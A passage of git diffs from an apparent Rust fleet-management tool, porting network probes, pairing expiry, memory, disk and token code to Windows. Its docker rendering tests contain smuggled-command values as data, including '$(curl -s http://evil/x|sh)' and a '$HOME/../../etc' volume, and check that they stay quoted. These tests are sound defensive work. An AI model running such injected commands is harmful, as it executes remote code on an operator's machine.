+            assert!(super::super::is_an_answer(Err(E::ConnectionReset)));
+            // A host that is not there answers quickly and must still read as
+            // unreachable — the case a "did it come back fast?" rule would get
+            // exactly backwards.
+            assert!(!super::super::is_an_answer(Err(E::HostUnreachable)));
+            assert!(!super::super::is_an_answer(Err(E::NetworkUnreachable)));
+            assert!(!super::super::is_an_answer(Err(E::TimedOut)));
         }
 
         #[test]

--- a/crates/atlasctl-agent/src/rendezvous.rs
+++ b/crates/atlasctl-agent/src/rendezvous.rs
@@ -133,34 +133,27 @@ fn is_an_answer(outcome: Result<(), std::io::ErrorKind>) -> bool {
 
 /// Connect, giving up after [`PROBE_TIMEOUT`]. `None` means the window expired
 /// with no answer at all.
-#[cfg(not(windows))]
+///
+/// # Windows
+///
+/// On Windows this returns `None` for a closed port as well, and there is no
+/// way around it from here. Defender Firewall drops an inbound SYN to a port
+/// with no listener instead of letting the stack reset it, so a closed port is
+/// FILTERED, not refused — measured on CI against a port reserved with a UDP
+/// socket, which nothing has ever listened on: `connect_timeout` and a blocking
+/// connect on its own thread both reported silence.
+///
+/// The consequence is real and worth stating: on Windows this probe can only
+/// confirm reachability when something ACCEPTS, so a Windows node cannot be
+/// probed-reachable for a rendezvous address that subnet arithmetic does not
+/// already cover. `can_reach` checks the directly-attached case first, which is
+/// exact and free, so a Windows node on a shared subnet is unaffected.
 fn connect_outcome(addr: SocketAddr) -> Option<Result<(), std::io::ErrorKind>> {
     match TcpStream::connect_timeout(&addr, PROBE_TIMEOUT) {
         Ok(_) => Some(Ok(())),
         Err(e) if e.kind() == std::io::ErrorKind::TimedOut => None,
         Err(e) => Some(Err(e.kind())),
     }
-}
-
-/// The same, on Windows, where `connect_timeout` cannot express the answer.
-///
-/// It reports a REFUSED connection as `TimedOut` — measured, not assumed: a
-/// port this process had just released came back `Some(TimedOut)` on CI. The
-/// cause is that a failed non-blocking connect is signalled through `select`'s
-/// exception set, which that path does not consult, so every refusal is
-/// indistinguishable from silence and every healthy peer reads as unreachable.
-///
-/// A blocking connect on its own thread does report the refusal. The thread is
-/// abandoned rather than joined when the window expires; it ends by itself when
-/// the OS connect gives up, and a probe must not block the caller for the two
-/// minutes that can take.
-#[cfg(windows)]
-fn connect_outcome(addr: SocketAddr) -> Option<Result<(), std::io::ErrorKind>> {
-    let (tx, rx) = std::sync::mpsc::channel();
-    std::thread::spawn(move || {
-        let _ = tx.send(TcpStream::connect(addr).map(|_| ()).map_err(|e| e.kind()));
-    });
-    rx.recv_timeout(PROBE_TIMEOUT).ok()
 }
 
 /// The best address among `candidates` that this machine can actually reach.
@@ -321,6 +314,12 @@ mod tests {
         /// Nothing listens on the rendezvous port until rank 0 starts, so a
         /// refused connection is the expected answer from a healthy peer — and
         /// the one that separates it from a link going nowhere.
+        // Not on Windows: Defender Firewall drops the SYN to a closed port
+        // rather than resetting it, so there is no refusal to observe. That is
+        // a property of the platform, not of this code, and asserting it there
+        // would be asserting the firewall's configuration. The rule this probe
+        // applies is covered on every platform by the test below.
+        #[cfg(not(windows))]
         #[test]
         fn a_refused_connection_counts_as_reachable() {
             // The port number is reserved with a UDP socket, and TCP is probed
@@ -341,11 +340,10 @@ mod tests {
                 std::net::TcpStream::connect_timeout(&SocketAddr::new(ip, port), PROBE_TIMEOUT)
                     .err()
                     .map(|e| e.kind());
-            let via_probe = super::super::connect_outcome(SocketAddr::new(ip, port));
             assert!(
                 answers("127.0.0.1", port),
-                "a closed loopback port must read as reachable; port {port} gave \
-                 connect_timeout={via_timeout:?} probe={via_probe:?}"
+                "a closed loopback port must read as reachable; \
+                 port {port} gave {via_timeout:?}"
             );
         }
 

--- a/crates/atlasctl-agent/src/session.rs
+++ b/crates/atlasctl-agent/src/session.rs
@@ -76,7 +76,15 @@ const PENDING_PAIRING_TTL: std::time::Duration = std::time::Duration::from_secs(
 /// An exchange that completed and is waiting to be accepted or refused.
 struct PendingPairing {
     outcome: crate::fleet::PairOutcome,
-    at: std::time::Instant,
+    /// When this exchange stops being confirmable.
+    ///
+    /// The DEADLINE, not the start. Storing the start and comparing
+    /// `at.elapsed() > TTL` is the same predicate, but it can only be tested by
+    /// constructing an `Instant` a full TTL in the past — which does not exist
+    /// on a machine that booted more recently than that. Every CI runner is
+    /// such a machine, so the expiry test passed only where it happened to be
+    /// run on a long-lived host.
+    expires_at: std::time::Instant,
 }
 
 pub struct Session<'a> {

--- a/crates/atlasctl-agent/src/session/fleet.rs
+++ b/crates/atlasctl-agent/src/session/fleet.rs
@@ -109,7 +109,7 @@ impl Session<'_> {
                 // single dialog, and a superseded exchange's words are stale.
                 self.pending_pairing = Some(super::PendingPairing {
                     outcome,
-                    at: std::time::Instant::now(),
+                    expires_at: std::time::Instant::now() + super::PENDING_PAIRING_TTL,
                 });
                 vec![ServerMsg::PairResult {
                     id,
@@ -155,7 +155,7 @@ impl Session<'_> {
                 );
                 self.pending_pairing = Some(super::PendingPairing {
                     outcome,
-                    at: std::time::Instant::now(),
+                    expires_at: std::time::Instant::now() + super::PENDING_PAIRING_TTL,
                 });
                 vec![ServerMsg::PairAtResult {
                     id,
@@ -212,7 +212,7 @@ impl Session<'_> {
                 "that is not the machine this connection just paired with. Nothing was trusted.",
             )];
         }
-        if pending.at.elapsed() > super::PENDING_PAIRING_TTL {
+        if std::time::Instant::now() >= pending.expires_at {
             return vec![decision(
                 id,
                 node,

--- a/crates/atlasctl-agent/src/session/pairing_tests.rs
+++ b/crates/atlasctl-agent/src/session/pairing_tests.rs
@@ -344,9 +344,10 @@ fn an_exchange_older_than_the_ttl_cannot_be_confirmed() {
         .pending_pairing
         .as_mut()
         .expect("the exchange should be pending");
-    pending.at = std::time::Instant::now()
-        .checked_sub(super::PENDING_PAIRING_TTL + std::time::Duration::from_secs(1))
-        .expect("clock underflow");
+    // Bringing the deadline forward, rather than pushing the start back: an
+    // `Instant` a full TTL in the past does not exist on a machine that booted
+    // more recently than that, which is every CI runner.
+    pending.expires_at = std::time::Instant::now();
 
     let out = s.handle(ClientMsg::ConfirmPairing {
         id: 2,

--- a/crates/atlasctl-agent/src/telemetry/meminfo.rs
+++ b/crates/atlasctl-agent/src/telemetry/meminfo.rs
@@ -15,15 +15,48 @@ pub struct MemInfo {
 }
 
 /// Whether host memory can be read here.
+#[cfg(not(windows))]
 pub fn available() -> bool {
     std::path::Path::new("/proc/meminfo").exists()
 }
 
+/// Whether host memory can be read here.
+///
+/// Always: `GlobalMemoryStatusEx` is part of the OS, not an optional file.
+#[cfg(windows)]
+pub fn available() -> bool {
+    true
+}
+
 /// Read host memory.
+#[cfg(not(windows))]
 pub fn read() -> MemInfo {
     std::fs::read_to_string("/proc/meminfo")
         .map(|s| parse(&s))
         .unwrap_or_default()
+}
+
+/// Read host memory.
+///
+/// `ullAvailPhys` is the counterpart of `MemAvailable`, not of `MemFree`: it
+/// counts memory obtainable without paging, so a machine that has just loaded
+/// a large model reads as busy rather than as full.
+#[cfg(windows)]
+pub fn read() -> MemInfo {
+    use windows_sys::Win32::System::SystemInformation::{GlobalMemoryStatusEx, MEMORYSTATUSEX};
+    let mut st: MEMORYSTATUSEX = unsafe { std::mem::zeroed() };
+    // Required by the API: it dispatches on the struct size it was compiled
+    // against, and a zero here makes the call fail rather than misbehave.
+    st.dwLength = u32::try_from(std::mem::size_of::<MEMORYSTATUSEX>()).unwrap_or(0);
+    // SAFETY: `st` is a correctly sized, zeroed MEMORYSTATUSEX with dwLength
+    // set, which is the entire contract; it is read only after success.
+    if unsafe { GlobalMemoryStatusEx(&raw mut st) } == 0 {
+        return MemInfo::default();
+    }
+    MemInfo {
+        total_bytes: Some(st.ullTotalPhys),
+        used_bytes: Some(st.ullTotalPhys.saturating_sub(st.ullAvailPhys)),
+    }
 }
 
 /// Parse `/proc/meminfo`.

--- a/crates/atlasctl-agent/src/token.rs
+++ b/crates/atlasctl-agent/src/token.rs
@@ -59,7 +59,7 @@ pub fn load_or_create(config_dir: &Path) -> Result<String> {
             .with_context(|| format!("reading {}", p.display()))?
             .trim()
             .to_string();
-        check_permissions(&p)?;
+        atlasctl_core::secretfile::verify(&p)?;
         if token.len() != TOKEN_BYTES * 2 {
             bail!(
                 "{} does not contain a well-formed token; delete it and run \
@@ -73,7 +73,7 @@ pub fn load_or_create(config_dir: &Path) -> Result<String> {
     std::fs::create_dir_all(config_dir)
         .with_context(|| format!("creating {}", config_dir.display()))?;
     let token = generate()?;
-    write_private(&p, &token)?;
+    atlasctl_core::secretfile::write(&p, token.as_bytes())?;
     Ok(token)
 }
 
@@ -81,51 +81,8 @@ pub fn load_or_create(config_dir: &Path) -> Result<String> {
 pub fn rotate(config_dir: &Path) -> Result<String> {
     let token = generate()?;
     std::fs::create_dir_all(config_dir)?;
-    write_private(&path(config_dir), &token)?;
+    atlasctl_core::secretfile::write(&path(config_dir), token.as_bytes())?;
     Ok(token)
-}
-
-#[cfg(unix)]
-fn write_private(p: &Path, token: &str) -> Result<()> {
-    use std::io::Write;
-    use std::os::unix::fs::OpenOptionsExt;
-    // Create with the right mode rather than chmod-ing after: otherwise the
-    // token exists world-readable for a moment, however short.
-    let mut f = std::fs::OpenOptions::new()
-        .write(true)
-        .create(true)
-        .truncate(true)
-        .mode(0o600)
-        .open(p)
-        .with_context(|| format!("creating {}", p.display()))?;
-    f.write_all(token.as_bytes())?;
-    Ok(())
-}
-
-#[cfg(not(unix))]
-fn write_private(p: &Path, token: &str) -> Result<()> {
-    std::fs::write(p, token).with_context(|| format!("creating {}", p.display()))
-}
-
-#[cfg(unix)]
-fn check_permissions(p: &Path) -> Result<()> {
-    use std::os::unix::fs::PermissionsExt;
-    let mode = std::fs::metadata(p)?.permissions().mode() & 0o077;
-    if mode != 0 {
-        bail!(
-            "{} is readable by other accounts (mode {:o}). Another user on this \
-             machine may already have your pairing token; rotate it with \
-             `atlasctl agent token --rotate`.",
-            p.display(),
-            std::fs::metadata(p)?.permissions().mode() & 0o777
-        );
-    }
-    Ok(())
-}
-
-#[cfg(not(unix))]
-fn check_permissions(_p: &Path) -> Result<()> {
-    Ok(())
 }
 
 /// Compare a presented token against the real one, in constant time.

--- a/crates/atlasctl-agent/src/token.rs
+++ b/crates/atlasctl-agent/src/token.rs
@@ -31,14 +31,14 @@ fn hex(bytes: &[u8]) -> String {
 
 /// Generate a fresh token from the operating system's CSPRNG.
 ///
-/// Reads `/dev/urandom` directly rather than taking a dependency: this is the
-/// one place randomness matters, and the kernel interface is stable.
+/// Through `getrandom`, like the other three places this codebase draws
+/// entropy — including the identity key seed, which matters more than this
+/// does. Reading `/dev/urandom` by hand was the odd one out, and it failed on
+/// Windows with `The system cannot find the path specified`, which is to say
+/// no browser token could ever be minted there.
 pub fn generate() -> Result<String> {
     let mut buf = [0u8; TOKEN_BYTES];
-    let mut f = std::fs::File::open("/dev/urandom").context("opening the system CSPRNG")?;
-    use std::io::Read;
-    f.read_exact(&mut buf)
-        .context("reading from the system CSPRNG")?;
+    getrandom::fill(&mut buf).context("reading from the system CSPRNG")?;
     Ok(hex(&buf))
 }
 

--- a/crates/atlasctl-core/Cargo.toml
+++ b/crates/atlasctl-core/Cargo.toml
@@ -38,4 +38,5 @@ libc = "0.2"
 windows-sys = { version = "0.59", features = [
   "Win32_Foundation",
   "Win32_Storage_FileSystem",
+  "Win32_System_Console",
 ] }

--- a/crates/atlasctl-core/Cargo.toml
+++ b/crates/atlasctl-core/Cargo.toml
@@ -32,3 +32,10 @@ workspace = true
 
 [target.'cfg(unix)'.dependencies]
 rustix = { version = "1", features = ["process"] }
+libc = "0.2"
+
+[target.'cfg(windows)'.dependencies]
+windows-sys = { version = "0.59", features = [
+  "Win32_Foundation",
+  "Win32_Storage_FileSystem",
+] }

--- a/crates/atlasctl-core/Cargo.toml
+++ b/crates/atlasctl-core/Cargo.toml
@@ -29,3 +29,6 @@ test-mocks = []
 
 [lints]
 workspace = true
+
+[target.'cfg(unix)'.dependencies]
+rustix = { version = "1", features = ["process"] }

--- a/crates/atlasctl-core/src/docker/command.rs
+++ b/crates/atlasctl-core/src/docker/command.rs
@@ -129,7 +129,9 @@ impl DockerCommand {
     pub fn to_argv(&self) -> Vec<String> {
         // Execution takes the text only: there is no shell on this path, so
         // the symbolic marking is meaningless here by construction.
-        self.render(UserRender::Resolved, None)
+        // A resolved command is executed, never pasted, so nothing is
+        // symbolic in it and the placeholder is unreachable.
+        self.render(UserRender::Resolved, None, "")
             .into_iter()
             .map(|a| a.text)
             .collect()
@@ -144,8 +146,14 @@ impl DockerCommand {
     /// **unquoted** — quoting `$(id -u)` would turn the whole point of this
     /// rendering into a literal string, and the pasted command would fail with
     /// an unusable uid.
-    pub fn display_portable(&self, home: Option<&str>) -> String {
-        self.render(UserRender::Portable, home)
+    /// `home_placeholder` is what the literal home directory is replaced WITH,
+    /// and it is a parameter rather than a platform lookup because this
+    /// renderer is pure: reading the target inside it would make one function
+    /// produce two outputs, and the golden corpus — which is compared byte for
+    /// byte and generated on Linux — could then never pass anywhere else.
+    /// [`crate::platform::home_placeholder`] is what production passes.
+    pub fn display_portable(&self, home: Option<&str>, home_placeholder: &str) -> String {
+        self.render(UserRender::Portable, home, home_placeholder)
             .into_iter()
             .map(|a| {
                 if a.symbolic {
@@ -158,7 +166,12 @@ impl DockerCommand {
             .join(" ")
     }
 
-    fn render(&self, user_render: UserRender, home: Option<&str>) -> Vec<Arg> {
+    fn render(
+        &self,
+        user_render: UserRender,
+        home: Option<&str>,
+        home_placeholder: &str,
+    ) -> Vec<Arg> {
         let mut v: Vec<Arg> = vec!["docker".into(), "run".into()];
         if self.detach {
             v.push("-d".into());
@@ -234,14 +247,9 @@ impl DockerCommand {
             // may name a volume that already starts with `$HOME/`, and that is
             // data, not something to let the shell expand.
             let (host, rewritten) = match (user_render, home) {
-                (UserRender::Portable, Some(h)) if !h.is_empty() && host.starts_with(h) => (
-                    format!(
-                        "{}{}",
-                        crate::platform::home_placeholder(),
-                        &host[h.len()..]
-                    ),
-                    true,
-                ),
+                (UserRender::Portable, Some(h)) if !h.is_empty() && host.starts_with(h) => {
+                    (format!("{home_placeholder}{}", &host[h.len()..]), true)
+                }
                 _ => (host.clone(), false),
             };
             v.push("-v".into());

--- a/crates/atlasctl-core/src/docker/command.rs
+++ b/crates/atlasctl-core/src/docker/command.rs
@@ -234,9 +234,14 @@ impl DockerCommand {
             // may name a volume that already starts with `$HOME/`, and that is
             // data, not something to let the shell expand.
             let (host, rewritten) = match (user_render, home) {
-                (UserRender::Portable, Some(h)) if !h.is_empty() && host.starts_with(h) => {
-                    (format!("$HOME{}", &host[h.len()..]), true)
-                }
+                (UserRender::Portable, Some(h)) if !h.is_empty() && host.starts_with(h) => (
+                    format!(
+                        "{}{}",
+                        crate::platform::home_placeholder(),
+                        &host[h.len()..]
+                    ),
+                    true,
+                ),
                 _ => (host.clone(), false),
             };
             v.push("-v".into());

--- a/crates/atlasctl-core/src/docker/command/tests.rs
+++ b/crates/atlasctl-core/src/docker/command/tests.rs
@@ -132,10 +132,7 @@ fn the_portable_rendering_keeps_host_specifics_symbolic() {
         "uid must stay symbolic"
     );
     assert!(
-        portable.contains(&format!(
-            "{}/.cache/huggingface",
-            crate::platform::home_placeholder()
-        )),
+        portable.contains("$HOME/.cache/huggingface"),
         "home must stay symbolic"
     );
     assert!(

--- a/crates/atlasctl-core/src/docker/command/tests.rs
+++ b/crates/atlasctl-core/src/docker/command/tests.rs
@@ -132,7 +132,10 @@ fn the_portable_rendering_keeps_host_specifics_symbolic() {
         "uid must stay symbolic"
     );
     assert!(
-        portable.contains("$HOME/.cache/huggingface"),
+        portable.contains(&format!(
+            "{}/.cache/huggingface",
+            crate::platform::home_placeholder()
+        )),
         "home must stay symbolic"
     );
     assert!(
@@ -178,7 +181,10 @@ fn portable_substitutions_are_emitted_unquoted_so_the_shell_expands_them() {
         "got: {portable}"
     );
     assert!(
-        portable.contains("-v $HOME/.cache/huggingface:/cache/huggingface"),
+        portable.contains(&format!(
+            "-v {}/.cache/huggingface:/cache/huggingface",
+            crate::platform::home_placeholder()
+        )),
         "got: {portable}"
     );
     assert!(
@@ -186,7 +192,7 @@ fn portable_substitutions_are_emitted_unquoted_so_the_shell_expands_them() {
         "the substitution must not be quoted"
     );
     assert!(
-        !portable.contains("'$HOME"),
+        !portable.contains(&format!("'{}", crate::platform::home_placeholder())),
         "the home substitution must not be quoted"
     );
 }

--- a/crates/atlasctl-core/src/docker/command/tests.rs
+++ b/crates/atlasctl-core/src/docker/command/tests.rs
@@ -126,7 +126,7 @@ fn rendering_is_deterministic_across_calls() {
 
 #[test]
 fn the_portable_rendering_keeps_host_specifics_symbolic() {
-    let portable = sample().display_portable(Some("/home/spark"));
+    let portable = sample().display_portable(Some("/home/spark"), "$HOME");
     assert!(
         portable.contains("$(id -u):$(id -g)"),
         "uid must stay symbolic"
@@ -175,16 +175,13 @@ fn omitted_options_emit_nothing() {
 fn portable_substitutions_are_emitted_unquoted_so_the_shell_expands_them() {
     // Quoting these would make the pasted command run as the literal string
     // "$(id -u)", which fails with an unusable uid — the exact bug this guards.
-    let portable = sample().display_portable(Some("/home/spark"));
+    let portable = sample().display_portable(Some("/home/spark"), "$HOME");
     assert!(
         portable.contains("--user $(id -u):$(id -g)"),
         "got: {portable}"
     );
     assert!(
-        portable.contains(&format!(
-            "-v {}/.cache/huggingface:/cache/huggingface",
-            crate::platform::home_placeholder()
-        )),
+        portable.contains("-v $HOME/.cache/huggingface:/cache/huggingface"),
         "got: {portable}"
     );
     assert!(
@@ -192,7 +189,7 @@ fn portable_substitutions_are_emitted_unquoted_so_the_shell_expands_them() {
         "the substitution must not be quoted"
     );
     assert!(
-        !portable.contains(&format!("'{}", crate::platform::home_placeholder())),
+        !portable.contains("'$HOME"),
         "the home substitution must not be quoted"
     );
 }
@@ -202,7 +199,7 @@ fn a_dollar_sign_from_recipe_data_is_still_quoted_in_the_portable_form() {
     // Only the substitutions this renderer produces are exempt from quoting.
     let mut c = sample();
     c.env.insert("EVIL".into(), "$(touch /tmp/pwned)".into());
-    let portable = c.display_portable(Some("/home/spark"));
+    let portable = c.display_portable(Some("/home/spark"), "$HOME");
     assert!(
         portable.contains(r"'EVIL=$(touch /tmp/pwned)'"),
         "recipe-supplied substitutions must stay inert: {portable}"
@@ -225,7 +222,7 @@ fn a_recipe_env_value_cannot_smuggle_a_command_substitution() {
         "LEAK".to_owned(),
         "$(id -u)$(curl -s http://evil/x|sh)".to_owned(),
     );
-    let portable = c.display_portable(Some("/home/spark"));
+    let portable = c.display_portable(Some("/home/spark"), "$HOME");
     // Quoted, not absent: the operator should still SEE what the recipe asked
     // for. What must not happen is the shell running it.
     assert!(
@@ -247,7 +244,7 @@ fn a_recipe_volume_that_looks_rewritten_is_still_quoted() {
     let mut c = sample();
     c.volumes
         .insert("$HOME/../../etc".to_owned(), "/mnt".to_owned());
-    let portable = c.display_portable(Some("/home/spark"));
+    let portable = c.display_portable(Some("/home/spark"), "$HOME");
     assert!(
         !portable.contains(" $HOME/../../etc:/mnt"),
         "a recipe-supplied $HOME escaped quoting: {portable}"

--- a/crates/atlasctl-core/src/docker/translate.rs
+++ b/crates/atlasctl-core/src/docker/translate.rs
@@ -221,9 +221,9 @@ pub fn translate(
         ipc: profile.ipc.to_string(),
         shm_size: profile.shm_size.to_string(),
         network: profile.network.to_string(),
-        user: Some(UserSpec {
-            uid: host.uid,
-            gid: host.gid,
+        user: host.posix_user.map(|u| UserSpec {
+            uid: u.uid,
+            gid: u.gid,
         }),
         security_opts: profile
             .security_opts

--- a/crates/atlasctl-core/src/docker/translate/tests.rs
+++ b/crates/atlasctl-core/src/docker/translate/tests.rs
@@ -3,13 +3,16 @@
 use super::*;
 use crate::docker::collective::NcclRoce;
 use crate::docker::profile::{AmdDevices, NvidiaDevices, ROOTLESS_V1};
+use crate::host::PosixUser;
 use crate::recipe::Provenance;
 use crate::scalar::ScalarValue;
 
 pub(super) fn host() -> HostSnapshot {
     HostSnapshot {
-        uid: 1000,
-        gid: 1000,
+        posix_user: Some(PosixUser {
+            uid: 1000,
+            gid: 1000,
+        }),
         home: "/home/spark".into(),
         hf_cache_dir: "/home/spark/.cache/huggingface".into(),
         // TOKEN stands for a credential the agent holds; the proxy is the

--- a/crates/atlasctl-core/src/host.rs
+++ b/crates/atlasctl-core/src/host.rs
@@ -4,6 +4,15 @@
 
 use std::collections::BTreeMap;
 
+/// A host's POSIX identity.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub struct PosixUser {
+    /// The uid the container should run as.
+    pub uid: u32,
+    /// The gid the container should run as.
+    pub gid: u32,
+}
+
 /// Everything `translate` needs to know about the machine, captured once.
 ///
 /// Taking a snapshot rather than querying the OS mid-translation is what keeps
@@ -11,10 +20,13 @@ use std::collections::BTreeMap;
 /// the same command, on any machine, with no GPU and no docker present.
 #[derive(Debug, Clone, PartialEq, Eq)]
 pub struct HostSnapshot {
-    /// The uid the container should run as.
-    pub uid: u32,
-    /// The gid the container should run as.
-    pub gid: u32,
+    /// The POSIX user the container should run as, when the host has one.
+    ///
+    /// `None` is an answer, not a gap: a Windows account has no uid, so there
+    /// is no correct number to put here. Rendering `--user 0:0` for it would
+    /// run the container as root, and the `/etc/passwd` mounts that accompany
+    /// `--user` name host paths that do not exist there.
+    pub posix_user: Option<PosixUser>,
     /// The user's home directory, used to render a portable command.
     pub home: String,
     /// Where HuggingFace caches models on this host.
@@ -74,8 +86,10 @@ mod tests {
 
     fn host() -> HostSnapshot {
         HostSnapshot {
-            uid: 1000,
-            gid: 1000,
+            posix_user: Some(PosixUser {
+                uid: 1000,
+                gid: 1000,
+            }),
             home: "/home/spark".into(),
             hf_cache_dir: "/home/spark/.cache/huggingface".into(),
             env: [("TOKEN".to_string(), "abc".to_string())].into(),

--- a/crates/atlasctl-core/src/io/process.rs
+++ b/crates/atlasctl-core/src/io/process.rs
@@ -164,14 +164,39 @@ mod tests {
         assert!(StdProcessRunner.run(&[]).is_err());
     }
 
+    /// The claim that only unix can express: a shell metacharacter must come
+    /// back as literal text. `/bin/echo` is the BINARY, not the shell builtin,
+    /// so a `;` that survives proves nothing wrapped the argv in `sh -c`.
+    ///
+    /// There is no Windows counterpart, and inventing one would be theatre:
+    /// `echo` is a cmd builtin there, and `;` carries no meaning for any
+    /// Windows shell to strip. What Windows CAN check is the half below.
+    #[cfg(unix)]
     #[test]
-    fn the_real_runner_captures_output_without_a_shell() {
-        // `echo` here is the binary, not a shell builtin, and the metacharacter
-        // must come back as literal text rather than being interpreted.
+    fn the_real_runner_does_not_interpret_metacharacters() {
         let out = StdProcessRunner
             .run(&["/bin/echo".into(), "a;b".into()])
             .expect("echo runs");
         assert!(out.success());
         assert_eq!(out.stdout.trim(), "a;b");
+    }
+
+    /// The half that holds everywhere: a real program runs, its argument
+    /// arrives whole, and its stdout is captured.
+    #[test]
+    fn the_real_runner_captures_a_program_s_output() {
+        let argv: Vec<String> = if cfg!(windows) {
+            vec![
+                "cmd.exe".into(),
+                "/c".into(),
+                "echo".into(),
+                "atlas-ok".into(),
+            ]
+        } else {
+            vec!["/bin/echo".into(), "atlas-ok".into()]
+        };
+        let out = StdProcessRunner.run(&argv).expect("the program runs");
+        assert!(out.success(), "{out:?}");
+        assert_eq!(out.stdout.trim(), "atlas-ok");
     }
 }

--- a/crates/atlasctl-core/src/lib.rs
+++ b/crates/atlasctl-core/src/lib.rs
@@ -12,9 +12,11 @@ pub mod host;
 pub mod io;
 pub mod metrics;
 pub mod nearest;
+pub mod platform;
 pub mod recipe;
 pub mod registry;
 pub mod scalar;
+pub mod secretfile;
 pub mod settings;
 
 pub use docker::{DockerCommand, LaunchProfile};

--- a/crates/atlasctl-core/src/platform.rs
+++ b/crates/atlasctl-core/src/platform.rs
@@ -123,6 +123,105 @@ pub fn posix_user() -> Option<crate::host::PosixUser> {
     }
 }
 
+/// Free bytes on the filesystem holding `path`, when it can be determined.
+///
+/// One implementation, because "how much room is left" was asked in two places
+/// with two different answers: the fleet vitals called `statvfs` and returned
+/// `None` everywhere else, and `doctor` shelled out to `df -Pk`, which does not
+/// exist on Windows at all. A machine whose disk column is blank is a machine
+/// nobody checks before a 100 GB pull.
+///
+/// A full model cache is a leading cause of launch failure, so this is worth a
+/// platform call.
+#[must_use]
+pub fn free_bytes(path: &std::path::Path) -> Option<u64> {
+    // The directory may not exist yet on a fresh install, and asking the OS
+    // about a missing path fails. What matters is the filesystem that WOULD
+    // hold it, so walk up to the nearest ancestor that does exist.
+    let mut probe = path;
+    while !probe.exists() {
+        probe = probe.parent()?;
+    }
+    free_bytes_of_existing(probe)
+}
+
+// `allow`, not `expect`: `f_bavail` and `f_frsize` are u64 on 64-bit targets,
+// where the conversion is a no-op clippy objects to, and narrower on others,
+// where dropping it would silently truncate a disk size. An `expect` would then
+// fail on exactly the targets that need the conversion.
+#[allow(clippy::useless_conversion, reason = "the widths are target-dependent")]
+#[cfg(unix)]
+fn free_bytes_of_existing(probe: &std::path::Path) -> Option<u64> {
+    use std::os::unix::ffi::OsStrExt;
+    let c = std::ffi::CString::new(probe.as_os_str().as_bytes()).ok()?;
+    // SAFETY: `c` is a valid NUL-terminated path and `stat` is written only by
+    // the call, which reports success before we read it.
+    let mut stat: libc::statvfs = unsafe { std::mem::zeroed() };
+    if unsafe { libc::statvfs(c.as_ptr(), &raw mut stat) } != 0 {
+        return None;
+    }
+    u64::try_from(stat.f_bavail)
+        .ok()?
+        .checked_mul(u64::try_from(stat.f_frsize).ok()?)
+}
+
+#[cfg(windows)]
+fn free_bytes_of_existing(probe: &std::path::Path) -> Option<u64> {
+    use std::os::windows::ffi::OsStrExt;
+    use windows_sys::Win32::Storage::FileSystem::GetDiskFreeSpaceExW;
+    let wide: Vec<u16> = probe
+        .as_os_str()
+        .encode_wide()
+        .chain(std::iter::once(0))
+        .collect();
+    let mut avail: u64 = 0;
+    // SAFETY: `wide` is NUL-terminated and outlives the call; `avail` is
+    // written only by it and read only after it reports success. The two
+    // total-size outputs are not wanted, and NULL is documented as the way to
+    // decline them.
+    let ok = unsafe {
+        GetDiskFreeSpaceExW(
+            wide.as_ptr(),
+            &raw mut avail,
+            std::ptr::null_mut(),
+            std::ptr::null_mut(),
+        )
+    };
+    // Available to THIS user, not the volume total: a per-user quota is the
+    // number that decides whether a pull fits.
+    (ok != 0).then_some(avail)
+}
+
+/// Find an executable on `PATH`.
+///
+/// On Windows a name without an extension is not a program: `docker` is
+/// `docker.exe`, and a lookup that only tries the bare name reports every tool
+/// on the machine as missing. `PATHEXT` is the list the shell itself uses.
+#[must_use]
+pub fn which(name: &str) -> Option<std::path::PathBuf> {
+    let path = std::env::var_os("PATH")?;
+    let candidates: Vec<String> = if cfg!(windows) {
+        let has_ext = std::path::Path::new(name).extension().is_some();
+        let mut v = if has_ext {
+            vec![name.to_owned()]
+        } else {
+            Vec::new()
+        };
+        let exts = std::env::var("PATHEXT").unwrap_or_else(|_| ".COM;.EXE;.BAT;.CMD".to_owned());
+        v.extend(
+            exts.split(';')
+                .filter(|e| !e.trim().is_empty())
+                .map(|e| format!("{name}{}", e.trim())),
+        );
+        v
+    } else {
+        vec![name.to_owned()]
+    };
+    std::env::split_paths(&path)
+        .flat_map(|d| candidates.iter().map(move |c| d.join(c)))
+        .find(|p| p.is_file())
+}
+
 /// This machine's name, for display and for a peer's `Hello`.
 ///
 /// Never fatal: a node with an unreadable hostname is still a usable node, and
@@ -164,6 +263,39 @@ mod tests {
     #[test]
     fn a_hostname_is_never_empty() {
         assert!(!hostname().is_empty());
+    }
+
+    /// The question this answers is asked before a 100 GB pull, so an answer
+    /// of "cannot tell" on a working machine is the failure that matters.
+    #[test]
+    fn free_space_is_readable_for_a_directory_that_exists() {
+        let n = free_bytes(&std::env::temp_dir()).expect("a temp dir has a filesystem");
+        assert!(
+            n > 0,
+            "a writable temp dir with zero bytes free is not credible"
+        );
+    }
+
+    /// A fresh install asks about a cache directory that does not exist yet.
+    /// Answering `None` there would blank the disk column on every new machine.
+    #[test]
+    fn free_space_walks_up_to_a_parent_that_exists() {
+        let missing = std::env::temp_dir()
+            .join("atlasctl-does-not-exist")
+            .join("nor-this");
+        assert!(
+            free_bytes(&missing).is_some(),
+            "must fall back to the volume"
+        );
+    }
+
+    /// `which` is how docker is found. On Windows a bare name never matches,
+    /// which reported every tool on the machine as missing.
+    #[test]
+    fn which_finds_a_real_program_and_not_an_invented_one() {
+        let real = if cfg!(windows) { "cmd" } else { "sh" };
+        assert!(which(real).is_some(), "{real} must be on PATH");
+        assert!(which("definitely-not-a-real-binary-xyz").is_none());
     }
 
     /// The uid model is a property of the platform, not of the machine: a unix

--- a/crates/atlasctl-core/src/platform.rs
+++ b/crates/atlasctl-core/src/platform.rs
@@ -209,6 +209,70 @@ pub const fn home_placeholder() -> &'static str {
     }
 }
 
+/// Send this process's stdout and stderr to `path`, appending.
+///
+/// Exists because a supervised agent's output has to land somewhere an
+/// operator can read. The alternative — wrapping the command in a shell that
+/// redirects — costs more than it looks on Windows: Task Scheduler's stop
+/// terminates only the process it started, so a `cmd.exe` wrapper is killed
+/// and the agent it launched is ORPHANED, still holding the port, and the
+/// replacement exits at startup. Measured on CI, where a reinstall reported
+/// "installed, but it is NOT running" every time.
+///
+/// Redirection is at the OS handle level rather than through a logging
+/// framework because every message this binary emits goes through `eprintln!`;
+/// intercepting those individually would mean not missing one, forever.
+///
+/// # Errors
+/// If the file cannot be opened, or the handles cannot be replaced.
+pub fn redirect_stdio(path: &std::path::Path) -> anyhow::Result<()> {
+    use anyhow::Context as _;
+    if let Some(parent) = path.parent() {
+        std::fs::create_dir_all(parent)
+            .with_context(|| format!("creating {}", parent.display()))?;
+    }
+    let file = std::fs::OpenOptions::new()
